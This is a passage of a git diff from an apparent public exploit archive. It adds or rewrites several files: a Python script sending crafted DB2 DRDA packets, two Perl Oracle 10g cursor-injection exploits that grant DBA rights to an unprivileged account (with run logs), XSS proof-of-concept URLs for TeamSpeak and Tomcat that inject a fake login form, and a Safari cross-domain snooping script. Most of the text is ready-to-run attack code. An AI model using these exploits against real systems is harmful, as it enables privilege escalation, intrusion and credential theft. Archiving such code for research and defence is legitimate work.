-"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44" -"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00" -"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54" -"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E" -"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28" -"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21" -"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20" -"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20" -"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20" -"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00" -"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00" -"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1" -) - -sockobj.close() - -# milw0rm.com [2009-04-03] +# Discovered by Dennis Yurichev + +# DB2TEST database should be present on target system +# GUEST account with QQ password shoule be present on target system + +from sys import * +from socket import * + +sockobj = socket(AF_INET, SOCK_STREAM) + +sockobj.connect ((argv[1], 50000)) + +sockobj.send( +"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" +"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" +"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" +"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" +"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" +"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" +"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" +"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16" +"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18" +"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB" +"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E" +) + +data=sockobj.recv(102400) + +sockobj.send( +"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03" +"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E" +"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2" +"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1" +"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00" +"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1" +"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3" +"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16" +"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0" +"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00" +"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11" +"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8" +"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40" +"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85" +"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2" +"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1" +) + +data=sockobj.recv(102400) + +sockobj.send( +"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC" +"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13" +"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20" +"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20" +"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20" +"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01" +"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53" +"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C" +"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E" +"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00" +"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20" +"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20" +"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20" +"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30" +"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14" +"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44" +"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00" +"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54" +"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E" +"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28" +"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21" +"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20" +"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20" +"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20" +"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00" +"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00" +"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1" +) + +sockobj.close() + +# milw0rm.com [2009-04-03] diff --git a/platforms/multiple/dos/948.c b/platforms/multiple/dos/948.c index 7977cb0a1..3a64028f4 100755 --- a/platforms/multiple/dos/948.c +++ b/platforms/multiple/dos/948.c @@ -455,6 +455,6 @@ main(int argc, char **argv) #endif return 0; -} - -// milw0rm.com [2005-04-20] +} + +// milw0rm.com [2005-04-20] diff --git a/platforms/multiple/local/30039.txt b/platforms/multiple/local/30039.txt new file mode 100755 index 000000000..5d918953e --- /dev/null +++ b/platforms/multiple/local/30039.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/23987/info + +Multiple personal firewall products are prone to a vulnerability that lets attackers bypass protection mechanisms. This issue occurs because the applications fail to properly implement protection mechanisms based on valid process identifiers. + +Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to the memory space of critical processes. This allows attackers to execute arbitrary code with elevated privileges; other attacks are also possible. + +The following applications are vulnerable to this issue: +- Comodo Firewall Pro 2.4.18.184 +- Comodo Personal Firewall 2.3.6.81 +- ZoneAlarm Pro 6.1.744.001 + +Other applications and versions may also be affected. + +http://www.exploit-db.com/sploits/30039-1.zip + +http://www.exploit-db.com/sploits/30039-2.zip \ No newline at end of file diff --git a/platforms/multiple/remote/30025.txt b/platforms/multiple/remote/30025.txt new file mode 100755 index 000000000..1bccf3484 --- /dev/null +++ b/platforms/multiple/remote/30025.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/23933/info + +TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected. + +http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=
User:
Pass:

&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/30052.txt b/platforms/multiple/remote/30052.txt new file mode 100755 index 000000000..4fdfa41e5 --- /dev/null +++ b/platforms/multiple/remote/30052.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/24058/info + +Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following Tomcat versions are affected: + +4.0.0 to 4.0.6 +4.1.0 to 4.1.36 +5.0.0 to 5.0.30 +5.5.0 to 5.5.23 +6.0.0 to 6.0.10 + +http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test= \ No newline at end of file diff --git a/platforms/multiple/remote/30078.js b/platforms/multiple/remote/30078.js new file mode 100755 index 000000000..e8b623344 --- /dev/null +++ b/platforms/multiple/remote/30078.js @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/24121/info + +Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions. + +Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks. + +This issue affects Safari 2.0.4; other versions may also be affected. + +var snoopWin; + +function run() { + snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480'); + snoopWin.blur(); + setTimeout("snoopy()", 5000); +} + +function snoopy() { + alert(snoopWin.location); + setTimeout("snoopy()", 5000); +} \ No newline at end of file diff --git a/platforms/multiple/remote/3375.pl b/platforms/multiple/remote/3375.pl index 3cbf477d5..074c5720d 100755 --- a/platforms/multiple/remote/3375.pl +++ b/platforms/multiple/remote/3375.pl @@ -1,140 +1,140 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPW$WORKER.MAIN exploit (10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privileg needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/archive/1/440439 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70. -# [-] Done! -# -# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 2 -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG -# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 -# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 -# ORA-00931: missing identifier -# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 -# ORA-06512: at line 1 -# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 -# ORA-06512: at "SYS.KUPW$WORKER", line 13468 -# ORA-06512: at "SYS.KUPW$WORKER", line 5810 -# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] -# ORA-06512: at "SYS.KUPW$WORKER", line 1243 -# ORA-31626: job does not exist -# ORA-39086: cannot retrieve job information -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--',''); -# END; -# "] at kupw-workerV2.pl line 100. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go ...(don't worry about errors)!\n"; -$sth = $dbh->prepare(qq{ -BEGIN - SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-26] +#!/usr/bin/perl +# +# Remote Oracle KUPW$WORKER.MAIN exploit (10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privileg needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/archive/1/440439 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70. +# [-] Done! +# +# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 2 +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG +# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 +# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 +# ORA-00931: missing identifier +# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 +# ORA-06512: at line 1 +# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 +# ORA-06512: at "SYS.KUPW$WORKER", line 13468 +# ORA-06512: at "SYS.KUPW$WORKER", line 5810 +# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] +# ORA-06512: at "SYS.KUPW$WORKER", line 1243 +# ORA-31626: job does not exist +# ORA-39086: cannot retrieve job information +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--',''); +# END; +# "] at kupw-workerV2.pl line 100. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go ...(don't worry about errors)!\n"; +$sth = $dbh->prepare(qq{ +BEGIN + SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-26] diff --git a/platforms/multiple/remote/3376.pl b/platforms/multiple/remote/3376.pl index dc07d415f..210683213 100755 --- a/platforms/multiple/remote/3376.pl +++ b/platforms/multiple/remote/3376.pl @@ -1,136 +1,136 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privileg needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/bid/16294 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68. -# [-] Done! -# -# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 2 -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-31626: job does not exist -# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 -# ORA-06512: at "SYS.KUPV$FT", line 330 -# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user -# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible -# ORA-00942: table or view does not exist -# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " -# DECLARE -# J BOOLEAN; R NUMBER; -# BEGIN -# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J); -# END; -# "] at kupv-ft_attach_jobV2.pl line 100. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go ...(don't worry about errors)!\n"; -$sth = $dbh->prepare(qq{ -DECLARE - J BOOLEAN; R NUMBER; -BEGIN - R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-26] +#!/usr/bin/perl +# +# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privileg needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/bid/16294 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68. +# [-] Done! +# +# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 2 +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-31626: job does not exist +# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 +# ORA-06512: at "SYS.KUPV$FT", line 330 +# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user +# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible +# ORA-00942: table or view does not exist +# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " +# DECLARE +# J BOOLEAN; R NUMBER; +# BEGIN +# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J); +# END; +# "] at kupv-ft_attach_jobV2.pl line 100. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go ...(don't worry about errors)!\n"; +$sth = $dbh->prepare(qq{ +DECLARE + J BOOLEAN; R NUMBER; +BEGIN + R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; 